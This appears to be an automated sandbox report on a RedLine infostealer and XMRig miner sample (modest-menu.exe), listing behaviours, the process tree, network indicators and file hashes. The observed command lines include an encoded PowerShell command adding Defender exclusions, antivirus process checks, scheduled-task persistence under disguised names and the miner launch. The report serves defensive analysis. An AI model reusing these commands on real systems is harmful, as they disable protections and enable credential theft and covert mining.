Malware Analysis Report

2025-03-15 04:45

Sample ID 240714-1eennswhmb
Target modest-menu.exe
SHA256 af05a42171b74bc253d3acee98761fd7f931b54d36ff76425b328c9aab9daf51
Tags
redline xmrig @mass1vexdd discovery execution infostealer miner persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af05a42171b74bc253d3acee98761fd7f931b54d36ff76425b328c9aab9daf51

Threat Level: Known bad

The file modest-menu.exe was found to be: Known bad.

Malicious Activity Summary

redline xmrig @mass1vexdd discovery execution infostealer miner persistence spyware stealer

XMRig Miner payload

xmrig

RedLine

RedLine payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Downloads MZ/PE file

Executes dropped EXE

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Power Settings

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Unsigned PE

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-14 21:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-14 21:33

Reported

2024-07-14 22:20

Platform

win11-20240709-en

Max time kernel

1800s

Max time network

1792s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 240 created 3276 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Windows\Explorer.EXE

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A
N/A N/A C:\ProgramData\Dllhost\dllhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\Dllhost\dllhost.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Dllhost\winlogson.exe N/A
Token: SeLockMemoryPrivilege N/A C:\ProgramData\Dllhost\winlogson.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe
PID 3156 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\modest-menu.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 1200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 2576 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1836 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 3836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 2132 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 3740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 3740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 3740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1836 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif
PID 1836 wrote to memory of 240 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif
PID 1836 wrote to memory of 3948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1836 wrote to memory of 3948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1836 wrote to memory of 3948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 240 wrote to memory of 1508 N/A C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 1508 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe C:\Users\Admin\AppData\Local\Temp\conhost.exe
PID 3952 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 3952 wrote to memory of 924 N/A C:\Users\Admin\AppData\Local\Temp\conhost.exe C:\Windows\system32\cmd.exe
PID 924 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 924 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 924 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 924 wrote to memory of 340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 924 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 924 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 924 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 924 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 924 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 924 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 924 wrote to memory of 4936 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2932 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4936 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 4752 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe
PID 4936 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\modest-menu.exe

"C:\Users\Admin\AppData\Local\Temp\modest-menu.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Army Army.cmd & Army.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 340417

C:\Windows\SysWOW64\findstr.exe

findstr /V "offeringsproductivityjmas" Adventures

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Might + Friendly + Patrol 340417\U

C:\Users\Admin\AppData\Local\Temp\340417\Ottawa.pif

340417\Ottawa.pif 340417\U

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\340417\RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p2201249071693326612168609430 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADUAbgB2AGMAVgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAVwBkAEcATABtAFYATgBxAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBKACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAQwAyAGEATwBlAFkAcABZADYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADUAbgB2AGMAVgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAVwBkAEcATABtAFYATgBxAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdgBKACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAQwAyAGEATwBlAFkAcABZADYAIwA+AA=="

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8489" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8489" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\ProgramData\Dllhost\dllhost.exe

C:\ProgramData\Dllhost\dllhost.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json

C:\Windows\SysWOW64\chcp.com

chcp 1251

C:\ProgramData\Dllhost\winlogson.exe

C:\ProgramData\Dllhost\winlogson.exe -c config.json

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
RU 85.28.47.132:80 tcp
US 172.67.75.172:443 api.ip.sb tcp
DE 147.45.47.81:80 147.45.47.81 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 147.45.47.81:80 147.45.47.81 tcp
DE 45.76.89.70:443 pool.hashvault.pro tcp

Files

C:\Users\Admin\AppData\Local\Temp\Army.cmd

MD5 e2425d43cd54cc723943e30a4f033694
SHA1 9456e4517c0fbb4a6aacf3ba4aa43df30c0ba005
SHA256 26248feff6ebf8f67a2d1ee44f28aa9a6bfa7a40577f87d234a2c004ac23c7b0
SHA512 f165fb45f01b8aa7cf326cbea282bcc8731f2eb8e3ce9f6f9ba5514d1d7cfd48244f211b84e103f8e3bab5b028f5675efc5912c8d0a5fcbb1041ae1c219da788

C:\Users\Admin\AppData\Local\Temp\Adventures

MD5 0ee94f8cad492b5fd03a9dd231c60a18
SHA1 6ecdb895598c0c5f6be511dceca17067a036e0b8
SHA256 8357ce1b051f7177a5e6a6ca979fbd822749460f96a6b6018a4e104304d7c40a
SHA512 ac51e99ffe955eb8e42b2e40e171fccdf27ddd630f5667c51f1897e0dc001afc8a70fcefcf10ee77af63c47273e94d92f1efbaa31501d462ec33402f2a96a07e

C:\Users\Admin\AppData\Local\Temp\Kruger

MD5 6c62d09f1e027adb68b159e9454a0ab0
SHA1 ab09092207492307c8c35ae074affdbb368d9c82
SHA256 a431c79eaa6c284843e59ba31f8a55e5dc069bc0b4d2983b495d3cd47c1d4885
SHA512 6a2c2ebcb6369f35b928441b0dca7b8c6f2600f58fb80c7a59e9f7fe919b6ca9c81acd23ada03975b43e302adc509d21107caef3d58221806e219ff527b62eb8

C:\Users\Admin\AppData\Local\Temp\Camping

MD5 c11316a56cedd333a9d41f09e16e38ad
SHA1 9860a34080713ce8afa6e0bab9334bda6cc1c465
SHA256 84af8a2ec9ef74d5ac1a4dee820ab3636ac164c51fe947b494e4069b0149c106
SHA512 9bd57a1d6e3d259679b56462236d95287acd4e3758db116db675d913c61b6ee4f95adaa1ea335649c7df0a866b51e7314570571d376f7e5f74d88e3c8fb9e4ba

C:\Users\Admin\AppData\Local\Temp\Impaired

MD5 a9111d61b308c03dfdf02065eaaf41af
SHA1 ca5561fa32672035b126f58d4b402bcbaa25a07f
SHA256 8621c33f49c03102038d49dad1e0f1f06205e90d764adbd149f8b606e180e574
SHA512 5583cff5b1766eb8c5eb000b8b1120f7d1b41d91761f1a9ec4d77573734766c03f6bfe0343b97b7cef21018ab88c3bf565cc2408eeb5630ad08a24c4e4d4b5b6

C:\Users\Admin\AppData\Local\Temp\Spatial

MD5 ac5081d9b765a4b9871c77987db9b95b
SHA1 adf6c3155d2514c9df8fb39afb96560b42e35b3f
SHA256 b5712cf8b41779a6edbe669bedf5f5083a975489d182bd5411f42c06f64f6a21
SHA512 ed01fe4b788a0f160b57f5495aa720a64813102726abc5e1a8e297238ea3e6b37caa3a7143fa672f670052b1b480d3fb1f8531895c93b339b2b177950e0bd1b7

C:\Users\Admin\AppData\Local\Temp\Par

MD5 03d8d764df24cdc61c097419f1c91777
SHA1 9fce8e42f71c3971975593c445d5d6d763e6da29
SHA256 cfad89b9e65fe178e18209d79a43e61c01d156fed6d3a5e42582d1d2bae569c5
SHA512 96f3c644b9cdb87ca1f324b0b60070568fcc4246db3375267b71dfdf7fb1c23ba7ce6b92e7256324b6e85dc2dff8c984e38fbeb6ac1cbbef75698da6321a466e

C:\Users\Admin\AppData\Local\Temp\Ebay

MD5 d6538826f2149a24a511c2687b958a39
SHA1 cb9cadd19ed5045b2dbdd864dcb8f4e854afc29f
SHA256 25c90c9641d5c57450ac7408ec660186ae670002093b719e3845797de828a1c1
SHA512 0829a6d91a1d899ccb131e0eddd7d63a46f7300bf344f30fd37f82ad516b9b62fb6bc8b3b9bc576e3c4618f1a2f626e9eb263bae91c38ce6d6bdf791f9a782fc

C:\Users\Admin\AppData\Local\Temp\Money

MD5 cea9a8ce470c95945a43dff5240ddfe2
SHA1 74395aa3c23a197d705f6ff1b5128f2e677d480c
SHA256 e55512924dc8270e239e538a548fdd29e1c8d3a0957bc0bd4e3bd45054c8c4c7
SHA512 26f1b37d584fb10d248dadc06c68d761ec5d43d28f9c74b1a4d0dfba15bfa851cd7b8046b663f3275078eb33e964c965fe1cf37752e8bbef5dfcb99028684d30

C:\Users\Admin\AppData\Local\Temp\Unsubscribe

MD5 f54d726010e32c5e2945e917afad4a4d
SHA1 ae0c1e3189b4e5ff3996446eaf7d69b4cdc97be8
SHA256 d96d6416c3ff92bf688281e6cc4047d145e5e6cb6b6d48d1714d66f8f740415d
